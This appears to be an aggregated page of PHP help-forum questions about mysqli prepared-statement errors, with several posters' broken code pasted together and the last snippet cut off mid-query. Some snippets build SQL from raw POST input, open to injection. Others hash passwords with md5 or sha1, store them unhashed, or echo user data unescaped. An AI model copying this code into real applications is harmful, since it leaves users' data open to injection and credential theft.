|
PHP - Warning: Mysqli_stmt::bind_param() [mysqli-stmt.bind-param]
Code: [Select]
$params = array(); $type=array(); $fragments = array(); while (list($chiave,$val) = each($_POST)){ if($val!=""){ $fragments[] = $chiave." = ?"; //echo $chiave; if($chiave=="ritiro" or $chiave=="data") $params[] = normalToDbDate($val); else $params[] = $val; if($chiave=="legale") $type[]='i'; else $type[]='s'; } } $prova=implode("",$type); foreach($params as $param) echo "<p>".$param."</p>"; //echo "val(".count($params).")-->".implode(',',$params); //echo "type(".strlen($prova).")-->".implode("",$type); $sql = $db->prepare("..... AND ".implode(" AND ", $fragments)); array_unshift($params,$prova) call_user_func_array( array( $sql, 'bind_param' ),$params); //$sql->bind_param($prova,$params); $sql->execute(); hi all, with the tructure above i've tried to implement the cration of a dynamic query for a search form. i debugged with echoes and che numbers of bind_param and the those in the prepared statement match in sense that count($params)=strlen($prova). having said that i get this error: Code: [Select] Warning: call_user_func_array() expects parameter 2 to be array, integer given in and no results are shown to me even when the filter match. Similar TutorialsHello,
I have problem durring binding update query. I can't find what is causing problem.
public function Update(Entry $e)
{
try
{
$query = "update entry set string = $e->string,delimiter=$e->delimiter where entryid= $e->id";
$stmt = $this->db->mysqli->prepare($query);
$stmt->bind_param('ssi',$e->string,$e->delimiter,$e->id);
$stmt->close();
}
catch(Exception $ex)
{
print 'Error: ' .$ex->getMessage();
}
}
When I run function update I'm getting next error:Warning: mysqli_stmt::bind_param(): Number of variables doesn't match number of parameters in prepared statement
Can you help me to solve this problem ?
Edited by danchi, 17 October 2014 - 10:25 AM. Hello, I'm getting some errors when binding parameters inside a loop, and it's doing my head in public function query($sql, $params) { if(!$sobj = $this->conn->prepare($sql)) { die('Query Prepare Error (' . $this->conn->mysqli_errno . ') ' . $this->conn->mysqli_error); } else { if(!is_array($params)) { $params = array_slice(func_get_args(), 1); } foreach($params as $value) { $type = strtolower(gettype($value)); $sobj->bind_param($type[0], $this->conn->real_escape_string($value)); } $sobj->execute(); $sobj->bind_result($result); $sobj->fetch(); $sobj->close(); return $result; } } The errors I'm getting is: Code: [Select] Warning: mysqli_stmt::bind_param() [mysqli-stmt.bind-param]: Number of variables doesn't match number of parameters in prepared statement in /nfs/c06/h02/mnt/97387/domains/nickythorne.com/html/v2/includes/classes/class_db2.php on line 67 Warning: mysqli_stmt::bind_param() [mysqli-stmt.bind-param]: Number of variables doesn't match number of parameters in prepared statement in /nfs/c06/h02/mnt/97387/domains/nickythorne.com/html/v2/includes/classes/class_db2.php on line 67 (Line 67 is $sobj->bind_param($type[0], $this->conn->real_escape_string($value)); above) I'm calling the function like this: $details = new DB(); echo $details->query("SELECT `postcode` FROM `details` WHERE `name` = ? and `address` = ?", array("Josh", "45 Ashdale Road")); Does anyone know how I can solve this? Thanks. update.php
<?php
// Include config file
require_once "config.php";
// Define variables and initialize with empty values
$head = $content = $date = $time = "";
$head_err = $content_err = $date_err = $time_err = "";
// Processing form data when form is submitted
if(isset($_POST["id"]) && !empty($_POST["id"])){
// Get hidden input value
$id = $_POST["id"];
// Validate head
$input_head = trim($_POST["head"]);
if( strlen($input_head) > 200){
$head_err = "Max character length is 200.";
} elseif(!filter_var($input_head, FILTER_VALIDATE_REGEXP, array("options"=>array("regexp"=>"/^[a-zA-Z\s]+$/")))){
$head_err = "Please enter a valid head.";
} else{
$head = $input_head;
}
// Validate content
$input_content = trim($_POST["content"]);
if(empty($input_content)){
$content_err = "Please enter an content.";
} else{
$content = $input_content;
}
// Validate date
$input_date = trim($_POST["date"]);
if(empty($input_date)){
$date_err = "Please enter an date.";
} else{
$date = $input_date;
}
// Validate time
$input_time = trim($_POST["time"]);
if(empty($input_time)){
$time_err = "Please enter an time.";
} else{
$time = $input_time;
}
// Check input errors before inserting in database
if(empty($head_err) && empty($content_err) && empty($date_err) && empty($time_err)){
// Prepare an update statement
$sql = "UPDATE list SET head=?, content=?, date=?, time=?, WHERE id=?";
if($stmt = mysqli_prepare($link, $sql)){
// Bind variables to the prepared statement as parameters
mysqli_stmt_bind_param($stmt, "ssssi", $param_head, $param_content, $param_date, $param_time, $param_id);
// Set parameters
$param_head = $head;
$param_content = $content;
$param_date = $date;
$param_time = $time;
$param_id = $id;
// Attempt to execute the prepared statement
if(mysqli_stmt_execute($stmt)){
// Records updated successfully. Redirect to landing page
header("location: index.php");
exit();
} else{
echo "Something went wrong. Please try again later.";
}
}
// Close statement
mysqli_stmt_close($stmt);
}
// Close connection
mysqli_close($link);
} else{
// Check existence of id parameter before processing further
if(isset($_GET["id"]) && !empty(trim($_GET["id"]))){
// Get URL parameter
$id = trim($_GET["id"]);
// Prepare a select statement
$sql = "SELECT * FROM list WHERE id = ?";
if($stmt = mysqli_prepare($link, $sql)){
// Bind variables to the prepared statement as parameters
mysqli_stmt_bind_param($stmt, "i", $param_id);
// Set parameters
$param_id = $id;
// Attempt to execute the prepared statement
if(mysqli_stmt_execute($stmt)){
$result = mysqli_stmt_get_result($stmt);
if(mysqli_num_rows($result) == 1){
/* Fetch result row as an associative array. Since the result set
contains only one row, we don't need to use while loop */
$row = mysqli_fetch_array($result, MYSQLI_ASSOC);
// Retrieve individual field value
$head = $row["head"];
$content = $row["content"];
$date = $row["date"];
$time = $row["time"];
} else{
// URL doesn't contain valid id. Redirect to error page
header("location: error.php");
exit();
}
} else{
echo "Oops! Something went wrong. Please try again later.";
}
}
// Close statement
mysqli_stmt_close($stmt);
// Close connection
mysqli_close($link);
} else{
// URL doesn't contain id parameter. Redirect to error page
header("location: error.php");
exit();
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Update Record</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.css">
<link rel="icon" type="image/png" href="https://www.htmlhints.com/image/fav-icon.png">
<meta name="msvalidate.01" content="B7807734CA7AACC0779B341BBB766A4E" />
<meta name="p:domain_verify" content="78ad0b4e41a4f27490d91585cb10df4a"/>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-145078782-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-145078782-1');
</script>
<style>
.wrapper{
width: 500px;
margin: 0 auto;
}
.hh_button {
display: inline-block;
text-decoration: none;
background: linear-gradient(to right,#ff8a00,#da1b60);
border: none;
color: white;
padding: 10px 25px;
font-size: 1rem;
border-radius: 3px;
cursor: pointer;
font-family: 'Roboto', sans-serif;
position: relative;
margin-top: 30px;
margin: 0px;
position: absolute;
right: 20px;
top: 1.5%;
}
header {
color: white;
padding: 20px;
margin-bottom: 20px;
}
header a, header a:hover {
text-decoration: none;
color: white;
}
</style>
</head>
<body>
<header>
<strong><i class="fas fa-chevron-left"></i> <a href="https://www.htmlhints.com/"></a> <i class="fas fa-chevron-right"></i></strong>
</header>
<div class="wrapper">
<div class="container-fluid">
<div class="row">
<div class="col-md-12">
<div class="page-header">
<h2>Update Record</h2>
</div>
<p>Please edit the input values and submit to update the record.</p>
<form action="<?php echo htmlspecialchars(basename($_SERVER['REQUEST_URI'])); ?>" method="post">
<div class="form-group <?php echo (!empty($head_err)) ? 'has-error' : ''; ?>">
<label>head</label>
<input type="text" name="head" class="form-control" value="<?php echo $head; ?>">
<span class="help-block"><?php echo $head_err;?></span>
</div>
<div class="form-group <?php echo (!empty($content_err)) ? 'has-error' : ''; ?>">
<label>content</label>
<textarea name="content" class="form-control"><?php echo $content; ?></textarea>
<span class="help-block"><?php echo $content_err;?></span>
</div>
<div class="form-group <?php echo (!empty($date_err)) ? 'has-error' : ''; ?>">
<label>date</label>
<input type="date" name="date" class="form-control" value="<?php echo $date; ?>">
<span class="help-block"><?php echo $date_err;?></span>
</div>
<div class="form-group <?php echo (!empty($time_err)) ? 'has-error' : ''; ?>">
<label>time</label>
<input type="time" name="time" class="form-control" value="<?php echo $time; ?>">
<span class="help-block"><?php echo $time_err;?></span>
</div>
</div>
<input type="hidden" name="id" value="<?php echo $id; ?>"/>
<input type="submit" class="btn btn-primary" value="Submit">
<a href="index.php" class="btn btn-default">Cancel</a>
</form>
</div>
</div>
</div>
</div>
<ins class="adsbygoogle my-3"
style="display:block"
data-ad-format="fluid"
data-ad-layout-key="-fb+5w+4e-db+86"
data-ad-client="ca-pub-1506739985879215"
data-ad-slot="5016195832"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</body>
</html>
database.sql -- phpMyAdmin SQL Dump -- version 5.0.3 -- https://www.phpmyadmin.net/ -- -- Host: 127.0.0.1 -- Generation Time: Nov 19, 2020 at 09:41 PM -- Server version: 10.4.14-MariaDB -- PHP Version: 7.4.11 SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; START TRANSACTION; SET time_zone = "+00:00"; /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8mb4 */; -- -- Database: `tododb` -- -- -------------------------------------------------------- -- -- Table structure for table `list` -- CREATE TABLE `list` ( `id` int(20) NOT NULL, `head` varchar(200) NOT NULL, `content` text NOT NULL, `date` date NOT NULL, `time` time NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- -- Dumping data for table `list` -- INSERT INTO `list` (`id`, `head`, `content`, `date`, `time`) VALUES (69, 'task', 'test123', '2222-12-13', '22:22:00'); -- -- Indexes for dumped tables -- -- -- Indexes for table `list` -- ALTER TABLE `list` ADD PRIMARY KEY (`id`); -- -- AUTO_INCREMENT for dumped tables -- -- -- AUTO_INCREMENT for table `list` -- ALTER TABLE `list` MODIFY `id` int(20) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=70; COMMIT; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
Warning: mysqli_stmt_close() expects parameter 1 to be mysqli_stmt, bool given in C:\xampp\htdocs\todolist\update.php on line 75 Hi I have an infuriating problem which is stalling me with two large projects for a well known NGO right now. I am using mysqli and bound variables where the number of variables to bind is dependent on user input. I have a version of the code below working in php 5.2 but as of php 5.3 this method is no longer valid, specifically due to a change in the behavior of call_user_func_array with bound variables as arrays. I have read about this problem eslewhere but cannot get any of the workarounds to work with my example. Any help would be greatly appreciated. Code: [Select] # $parts is an array with variable number of values # $type is an array with variable number of values # $params is an array with variable number of values $query = 'SELECT SQL_CALC_FOUND_ROWS DISTINCT taxon.TaxonID, FROM taxon WHERE . join('', $parts) . " ORDER BY taxon.TaxonID"; # Prepare stmt if ($stmt = $mysqli->prepare($query)) { call_user_func_array (array($stmt, 'bind_param'),array_merge(array(join('', $type)), $params)); # execute $stmt->execute(); # bug info echo $stmt->errno, ':', $stmt->error; #store result $stmt->store_result(); # bind results $stmt->bind_result($ID); # fetch values while ($stmt->fetch()) { # results code goes here! } # free memory $stmt->free_result(); # close statement $stmt->close(); } I wrote a code with prepared statements MySQLi: Code: [Select] <?php include_once 'dbinfo.php'; if(isset($_POST['kuldes'])) { $name = trim($_POST['nev']); $username = $_POST['felh_nev']; $password = $_POST['jelszo']; $email = $_POST['email']; $phone = $_POST['telefon']; $gender = $_POST['sex']; $hobby = $_POST['hobby']; $regfelt = $_POST['regfelt']; $name = strip_tags($name); $name = stripslashes($name); $username = strip_tags($username); $email = strip_tags($email); $phone = strip_tags($phone); $date = date("d-m-Y"); if($name == NULL || $username == NULL || $password == NULL || $email == NULL || $phone == NULL || $gender == NULL) { echo "Please complete the form below or one of the boxes is empty."; } elseif(strlen($username) <= 3 || strlen($username) >= 30){ $final_report.="Your username must be between 3 and 30 characters.."; } elseif($stmt = $connect->prepare('SELECT * FROM users WHERE username=?')) { $stmt->bind_param('s', $username); $stmt->execute(); $stmt->bind_result($username); while ($stmt->fetch()) { printf("Name: %s\n", $name); $final_report.="The username is already in use!"; } $stmt->close(); }elseif(strlen($password) <= 6 || strlen($password) >= 12){ $final_report.="Your password must be between 6 and 12 digits and characters.."; } elseif(!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $email)){ $final_report.="Your email address was not valid.."; } elseif(!eregi("^[0-9]{1,3}-[0-9]{1,3}-[0-9]{1,10}$",$phone)){ $final_report.="Phone number is invalid. Only numbers with hyphen. Allowed format: countrycode-areacode-phonenumber"; } elseif(!isset($hobby)){ $final_report.="Youd didn't select any hobbies"; } elseif(!isset($regfelt)){ $final_report.="You didn't accept the terms"; } else { if ($stmt = $connection->prepare('INSERT INTO users(name,sex,email,phone_number,username,password,hobby) VALUES(?, ?, ?, ?, ?, ?, ?)')) { $stmt->bind_param('sssssss', $name, $sex, $email, $phone_number, $username, $password, $hobby); $stmt->execute(); $stmt->close(); } }}?> <h1>Registration Form</h1> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" name="registration_form" method="POST"> <p>Name: <input type="text" name="nev" value="<?php echo (isset($name) ? $name : ''); ''?>" size=25></p> <p>Username: <input type="text" name="felh_nev" value="<?php echo (isset($username) ? $username : ''); ?>" size=10></p> <p>Password: <input type="password" name="jelszo" size=10></p> <!--<p>Password again:<input type="password" name="password_confirmation"></p>--> <p>E-mail: <input type="text" name="email" value="<?php echo (isset($email) ? $email : ''); ?>"/></p> <p>Phone number: <input type="text" name="telefon" value="<?php echo (isset($phone) ? $phone : ''); ?>"/></p> <p>Sex: <label><input type="radio" name="sex" value="no" >Female</label> <label><input type="radio" name="sex" value="ferfi" >Male</label></p> <p>Favorite hobbies (Using CTRL you can select more than one):</p> <select name="hobby[]" size="4" multiple> <option value="sport">Sport</option> <option value="mozi">Movies</option> <option value="kirandulas">Hiking</option> <option value="olvasas">Reading</option> </select> <p><input name="regfelt" type="checkbox" value="elfogad">I accept the terms!</p> <p><input name="kuldes" type="submit" value="Submit form"> <input name="reset" type="reset" value="delete"></p> <table width="501" border="1"> <tr> <td><?php echo $final_report; ?></td> </tr> </table> <p> </p> </form>And I get the following error message: Warning: mysqli_stmt::bind_result() [mysqli-stmt.bind-result]: Number of bind variables doesn't match number of fields in prepared statement in I don't understand what's the problem is, many people can't give solution for this? Anyone who can help me? It's brain racking. Hey guys,
Earlier I mentioned making search criteria in my database. I also had to put in something to make it add to the database. I made some code like this:
<form id="form" name="form" method="post" action="Website2.php">
<p>
<label for="Genre">Genre</label>
<input type="text" name="Genre" id="Genre" />
</p>
<p>
<label for="Naam">Naam</label>
<input type="text" name="Naam" id="Naam" />
</p>
<p>
<label for="Jaar">Jaar</label>
<input type="text" name="Jaar" id="Jaar" />
</p>
<p>
<label for="Regisseur">Regisseur</label>
<input type="text" name="Regisseur" id="Regisseur" />
</p>
<p>
<input type="submit" name="Verzenden" id="Verzenden" value="Verzenden" />
</p>
</form>
<?php
$Genre = $_POST["Genre"];
$Naam = $_POST["Naam"];
$Jaar = $_POST["Jaar"];
$Regisseur = $_POST["Regisseur"];
/*Hier hoeft geen verbinden meer gemaakt te worden met de database*/
if (isset($_POST['Verzenden']) && trim($_POST['Verzenden'])!=''){
$sql = "INSERT INTO
Movies (Genre, Naam, Jaar, Regisseur)
VALUES ('$Genre', '$Naam', '$Jaar', '$Regisseur')";
$resultaat = mysqli_query($db, $sql);
$verbreken = mysqli_close($db);
echo "De gegevens van $Naam zijn opgeslagen in de database.";}
else echo 'Hier kunt u iets toevoegen';
?>
However it didn't work.
I got the problem "Warning: mysqli_query() expects parameter 1 to be mysqli, null given in... on line 119"
Can you guys help please?
Php Whizzs! Here is my login.php partial relevant to the case code:
$query_1 = "SELECT id,recruits_number,sponsor_username,account_activation_status,id_video_verification_status,id_verification_video_file_url,username,password,primary_domain,primary_website_email,registering_country,registering_ip,registering_browser,registering_os,registering_isp,age_range FROM users WHERE $querying_column = ?";
$stmt_1 = mysqli_prepare($conn,$query_1);
mysqli_stmt_bind_param($stmt_1,'s',$login_username_or_email_or_domain);
mysqli_stmt_execute($stmt_1);
//Check if User's details was successfully extracted or not from 'users' tbl.
if (!$stmt_1)
{
echo "ERROR 1: Sorry! Our system is currently experiencing a problem logging you in!";
exit();
}
else
{
$result_1 = mysqli_stmt_bind_result($stmt_1,$db_id,$db_recruits_number,$db_sponsor_username,$db_account_activation_status,$db_id_video_verification_status,$db_id_verification_video_file_url,$db_username,$db_password,$db_primary_domain,$db_website_email,$db_registering_country,$registering_ip,$registering_browser,$registering_os,$registering_isp,$db_age_range);
mysqli_stmt_fetch($stmt_1);
mysqli_stmt_close($stmt_1);
//Free Result_1 Set
mysqli_stmt_free_result($stmt_1);
I can login to user account with accurate password. Good! With wrong password, supposed to get error: "Incorrect log-in details". Instead get this:
"Warning: mysqli_stmt_free_result(): Couldn't fetch mysqli_stmt in C:\xampp\htdocs\test\login_v1.php on line 58 Line 58 is the last one: $result_1 = mysqli_stmt_bind_result($stmt_1,$db_id,$db_recruits_number,$db_sponsor_username,$db_account_activation_status,$db_id_video_verification_status,$db_id_verification_video_file_url,$db_username,$db_password,$db_primary_domain,$db_website_email,$db_registering_country,$registering_ip,$registering_browser,$registering_os,$registering_isp,$db_age_range); mysqli_stmt_fetch($stmt_1); mysqli_stmt_close($stmt_1); //Free Result_1 Set mysqli_stmt_free_result($stmt_1);
I read that you use "mysqli_stmt_free_result($stmt)" if you use mysqli_stmt_store_result($stmt). Is this causing the error ? Should I remove mysqli_stmt_free_result($stmt) ? Or, instead of this: mysqli_stmt_close($stmt_1); //Free Result_1 Set mysqli_stmt_free_result($stmt_1);
Should I do this: //Free Result_1 Set mysqli_stmt_free_result($stmt_1); mysqli_stmt_close($stmt_1);
Or, maybe I should add another line ? If so, then what and where ? Already checked the manual and stuck! How-about a sample code from your end ? Edited November 28, 2018 by phpsaneHello ,
I am trying to update a record in my table if the particular value exists in the rows of a table. But my if-else not working properly. I am not getting where i am going wrong.
here is my table authorization, where i define authorization % with min and max.
authorisation.JPG 16.83KB
0 downloads
after adding line items, before display i will check whether any one of the line item discount lies within this min and max and also checks whether authorization is required (required='Yes'/'No') for that discount in my authorization table. If authorization required then i will update that order number as authorized.
here is my line items table
line_items.JPG 20.37KB
0 downloads
I am doing like this
while($row=mysql_fetch_array($query))
{
$dis1 = "SELECT auth_id, auth_min, auth_max, required FROM sales_authorisation";
$dis2 = mysql_query($dis1) or die (mysql_error());
while($d1 = mysql_fetch_array($dis2))
{
$min = $d1['auth_min'];
$max = $d1['auth_max'];
$req = $d1['required'];
//echo $req;
if( ($min <= ($row['discount'])) && ($max >= ($row['discount'])) && ($req='Yes'))
{
$auth = "UPDATE orders SET authorise='No' WHERE order_id=".$order_id."";
echo "hello";
}
else
{
$auth = "UPDATE orders SET authorise='Yes' WHERE order_id=".$order_id."";
}
$auth1 = mysql_query($auth) or die (mysql_error());
}
?>
<tr>
<td><?php echo $counter++; ?></td>
<td><?php echo $row['itemname']; ?> - <?php echo $row['uom']; ?></td>
<td><?php echo $row['description']; ?></td>
<td><?php echo $row['quantity']; ?></td>
<td><?php echo number_format($row['selling_price'],2); ?></td>
<td><?php echo $row['discount']; ?> %</td>
<td><?php echo $row['tname']; ?>-<?php echo $row['rate']; ?> %</td>
<td><?php echo $row['freight']; ?></td>
<td><?php echo number_format($row['total'],2); ?></td>
</tr>
While loop is for displaying line items for the order.
But my if condition doesn't works . Not getting how to do it. please suggest
Please forgive me as I am new to php. I'm going to try and explain my problem the best I can. I'm trying to create a member login that checks that the username and password match before logging in. membership.php: require ('SQL.php'); class Membership { function validate_User($un, $pwd) { $mysql = new MySQL(); $ensure_credentials = $mysql->verify_Username_and_Pass($un, md5(trim($pwd) . PW_SALT)); if($ensure_credentials) { $_SESSION['status'] = 'authorized'; $_SESSION['uname'] = $un; header('location: index.php'); } else return "Please enter a correct username and password"; } SQL.php: class Mysql { private $conn; function __construct() { $this->conn = new mysqli($DB_HOST, $DB_USER, $DB_PASSWORD, $DB_DATABASE) or die('There was a problem connecting to the database.'); } function verify_Username_and_Pass($un, $pwd) { $query = "SELECT * FROM users WHERE username = ? AND password = ? LIMIT 1"; if($stmt = $this->conn->prepare($query)) { $stmt->bind_param('ss', $un, $pwd); $stmt->execute(); if($stmt->fetch()) { $stmt->close(); return true; } } } } After $un and $pwd are entered it returns "Please enter a correct username and password" regardless if the username and password are correct. If I change this line if($ensure_credentials) { in Membership.php to if($ensure_credentials != true) { it will allow me to login, except it only verifies $un, and $pwd can be anything. Please help! Hi Everyone, I've been using prepared statements to insert data into my database and they have been working just fine. I wanted to try prepared statements for select queries and began testing with the code provided at the PHP site. There are a couple of examples in the manual - one for mysqli_prepare() and another for mysqli_stmt_fetch(). The code looks like this: Code: [Select] <?php $link = mysqli_connect("localhost", "my_user", "my_password", "world"); /* check connection */ if (mysqli_connect_errno()) { printf("Connect failed: %s\n", mysqli_connect_error()); exit(); } $city = "Amersfoort"; /* create a prepared statement */ if ($stmt = mysqli_prepare($link, "SELECT District FROM City WHERE Name=?")) { /* bind parameters for markers */ mysqli_stmt_bind_param($stmt, "s", $city); /* execute query */ mysqli_stmt_execute($stmt); /* bind result variables */ mysqli_stmt_bind_result($stmt, $district); /* fetch value */ mysqli_stmt_fetch($stmt); printf("%s is in district %s\n", $city, $district); /* close statement */ mysqli_stmt_close($stmt); } /* close connection */ mysqli_close($link); ?> I am testing this code with a database and using SHA1 encryption for passwords. My code is as follows: Code: [Select] $username = "somename"; $passwd = "somepass"; // Check if username is unique $stmt = mysqli_prepare($conn, "select verify from users where user_name=? and password=sha1(?)"); mysqli_stmt_bind_param($stmt, "ss", $username, $passwd); mysqli_stmt_execute($stmt); mysqli_stmt_bind_result($stmt, $verify); mysqli_stmt_fetch($stmt); echo "The registration varification is ".$verify."<br />"; // Close the statement mysqli_stmt_close($stmt); // Close the link mysqli_close($conn); The results are not as expected as I get the error message, Warning: mysqli_stmt_fetch() Couldn't fetch mysqli_stmt. I've looked up the error and I haven't found anything on the web that explains what's causing it. I can echo the value of $verify, which I'll need farther down the script, but mysqli_stmt_fetch is returning "false", and I need a return of "true" as a conditional to test the state of a users account (in this case the state of the account should return "true"). I have used the hash version of the password and that yields the same result. Could someone please clue me in? I have no idea what the issue is. Thanks much for your time! cheers, Rick Hi,
I have two scripts using almost identical code. Is this because PHP 7 needs to use only indexes in the WHERE part of SQL Query? Here are the two scripts - first one works
$sql = 'SELECT access,fname FROM clients WHERE email=?';
$stmt = $connect->prepare($sql);
$stmt->execute([$email]);
$data_exists = ($stmt->fetchColumn() > 0) ? true : false;
if ($data_exists) { // account found.
$row = $stmt->fetch();
$access = $row['access'];
$fname = $row['fname'];
}
else {
$err_msg = 'Invalid Email Address and/or Password.';
$email = '';
$pass = '';
require_once ("login_fm.php");
exit;
}
[/PHP]
$sql = 'SELECT email,fname,lname,confirm FROM clients WHERE user_key=?';
$stmt = $connect->prepare($sql);
$stmt->execute([$the_key]);
$data_exists = ($stmt->fetchColumn() > 0) ? true : false;
if ($data_exists) { // Account found.
$row = $stmt->fetch();
$email = $row['email'];
$name = $row['fname'].' '.$row['lname'];
$confirm = $row['confirm'];
$_SESSION['auth'] = "yes";
$_SESSION['email'] = $email;
$_SESSION['name'] = $name;
$sql = 'UPDATE clients SET confirm = ?,log_count = log_count+1,last_date=? WHERE email=?';
$stmt= $connect->prepare($sql);
$stmt->execute(['y',$today_time,$email]);
require_once("index.php"); // SUCCESSFUL LOGIN: THIS LOADS THE START PAGE
exit;
} // end if
else {
$err_page_message = "ERROR - Account not found $the_key : $name";
require_once("err.php");
exit;
} // end else
May be it's a different reason - like I'm too tied !
But it would be nice to know why it isn't working.
It's quite simple, I just want to check to see if a row exists with the condition given, that's all. I never had this problem the old mysql but the PDO seems a bit tricky or I'm just using the wrong code lol.
Thanks Edited June 15, 2019 by David-LondonWell I have a library file class_database.php which defines a class called 'database' and a method called 'get' to retrieve database info. It was originally designed to return a two-dimensional array with the format of $array['index']['associative']. Right now I want to change this so as to return a result, which can then be used in other script files to retrieve data by using the fetch_array() method after getting this result. It doesnt work though, and I got this error 'Call to undefined method mysqli_stmt::get_result()', which confuses me... The two methods get() and _buildQuery are shown below, please help me figure out how to return an Mysql result so that I can use while($row = $db->get()->fetch_array()) on it with flexibility... The method get() Code: [Select] public function get($tableName, $numRows = NULL) { $this->_query = "SELECT * FROM $tableName"; $stmt = $this->_buildQuery($numRows); $stmt->execute(); $results = $stmt->get_result(); $this->reset(); return $results; } The method _buildQuery is shown below: Code: [Select] protected function _buildQuery($numRows = NULL, $tableData = NULL) { (gettype($tableData) === 'array') ? $hasTableData = true : $hasTableData = false; (!empty($this->_where )) ? $hasConditional = true : $hasConditional = false; // Did the user call the "where" method? if (!empty($this->_where)) { // if update data was passed, filter through and create the SQL query, accordingly. if ($hasTableData) { $i = 1; $pos = strpos($this->_query, 'UPDATE'); if ( $pos !== false) { foreach ($tableData as $prop => $value) { // determines what data type the item is, for binding purposes. $this->_paramTypeList .= $this->_determineType($value); // prepares the reset of the SQL query. ($i === count($tableData)) ? $this->_query .= $prop . ' = ?': $this->_query .= $prop . ' = ?, '; $i++; } } } //Prepair the where portion of the query $this->_query .= ' WHERE '; $i = 1; foreach ($this->_where as $column => $value) { // Determines what data type the where column is, for binding purposes. $this->_whereTypeList .= $this->_determineType($value); // Prepares the reset of the SQL query. ($i === count($this->_where)) ? $this->_query .= $column . ' = ?': $this->_query .= $column . ' = ? AND '; $i++; } } // Determine if is INSERT query if ($hasTableData) { $pos = strpos($this->_query, 'INSERT'); if ($pos !== false) { //is insert statement $keys = array_keys($tableData); $values = array_values($tableData); $num = count($keys); // wrap values in quotes foreach ($values as $key => $val) { $values[$key] = "'{$val}'"; $this->_paramTypeList .= $this->_determineType($val); } $this->_query .= '(' . implode($keys, ', ') . ')'; $this->_query .= ' VALUES('; while ($num !== 0) { ($num !== 1) ? $this->_query .= '?, ' : $this->_query .= '?)'; $num--; } } } // Did the user set a limit if (isset($numRows)) { $this->_query .= " LIMIT " . (int) $numRows; } // Prepare query $stmt = $this->_prepareQuery(); // Prepare table data bind parameters if ($hasTableData) { $this->_bindParams[0] = $this->_paramTypeList; foreach ($tableData as $prop => $val) { array_push($this->_bindParams, &$tableData[$prop]); } } // Prepare where condition bind parameters if($hasConditional) { if ($this->_where) { $this->_bindParams[0] .= $this->_whereTypeList; foreach ($this->_where as $prop => $val) { array_push($this->_bindParams, &$this->_where[$prop]); } } } // Bind parameters to statment if ($hasTableData || $hasConditional){ call_user_func_array(array($stmt, 'bind_param'), $this->_bindParams); } return $stmt; } I get this error when I run my login system. Call to a member function bind_param() on a non-object in /models/class.newuser.php on line 131This is the modified code (Line 131 is on the top line):
$stmt->bind_param("ssssi", $this->username, $secure_pass, $this->clean_email, $this->activation_token, $this->user_active);
$stmt->execute();
$inserted_id = $mysqli->insert_id;$stmt->close();
//Insert default permission into matches table
$stmt = $mysqli->prepare("INSERT INTO ".$db_table_prefix."user_permission_matches (
user_id,
permission_id
)
VALUES (
?,
'1'
)") ;
$stmt->bind_param("s", $inserted_id);
$stmt->execute();
$stmt->close();
This is the whole code...
<?php
/*
.
.
*/
class User
{
public $user_active = 0;
private $clean_email;
public $status = false;
private $clean_password;
private $username;
public $sql_failure = false;
public $mail_failure = false;
public $email_taken = false;
public $username_taken = false;
public $activation_token = 0;
public $success = NULL;
function __construct($user,$pass,$email)
{
//Sanitize
$this->clean_email = sanitize($email);
$this->clean_password = trim($pass);
$this->username = sanitize($user);
if(usernameExists($this->username))
{
$this->username_taken = true;
}
else if(emailExists($this->clean_email))
{
$this->email_taken = true;
}
else
{
//No problems have been found.
$this->status = true;
}
}
public function userCakeAddUser()
{
global $mysqli,$emailActivation,$websiteUrl,$db_table_prefix;
//Prevent this function being called if there were construction errors
if($this->status)
{
//Construct a secure hash for the plain text password
$secure_pass = generateHash($this->clean_password);
//Construct a unique activation token
$this->activation_token = generateActivationToken();
//Do we need to send out an activation email?
if($emailActivation == "true")
{
//User must activate their account first
$this->user_active = 0;
$mail = new userCakeMail();
//Build the activation message
$activation_message = lang("ACCOUNT_ACTIVATION_MESSAGE",array($websiteUrl,$this->activation_token));
//Define more if you want to build larger structures
$hooks = array(
"searchStrs" => array("#ACTIVATION-MESSAGE","#ACTIVATION-KEY","#USERNAME#"),
"subjectStrs" => array($activation_message,$this->activation_token,$this->username)
);
/* Build the template - Optional, you can just use the sendMail function
Instead to pass a message. */
if(!$mail->newTemplateMsg("new-registration.txt",$hooks))
{
$this->mail_failure = true;
}
else
{
//Send the mail. Specify users email here and subject.
//SendMail can have a third parementer for message if you do not wish to build a template.
if(!$mail->sendMail($this->clean_email,"New User"))
{
$this->mail_failure = true;
}
}
$this->success = lang("ACCOUNT_REGISTRATION_COMPLETE_TYPE2");
}
else
{
//Instant account activation
$this->user_active = 1;
$this->success = lang("ACCOUNT_REGISTRATION_COMPLETE_TYPE1");
}
if(!$this->mail_failure)
{
//Insert the user into the database providing no errors have been found.
$stmt = $mysqli->prepare("INSERT INTO ".$db_table_prefix."users (
user_name,
password,
email,
activation_token,
last_activation_request,
lost_password_request,
active,
title,
sign_up_stamp,
last_sign_in_stamp
)
VALUES (
?,
?,
?,
?,
?,
'".time()."',
'0',
?,
'New Member',
'".time()."',
'0'
)");
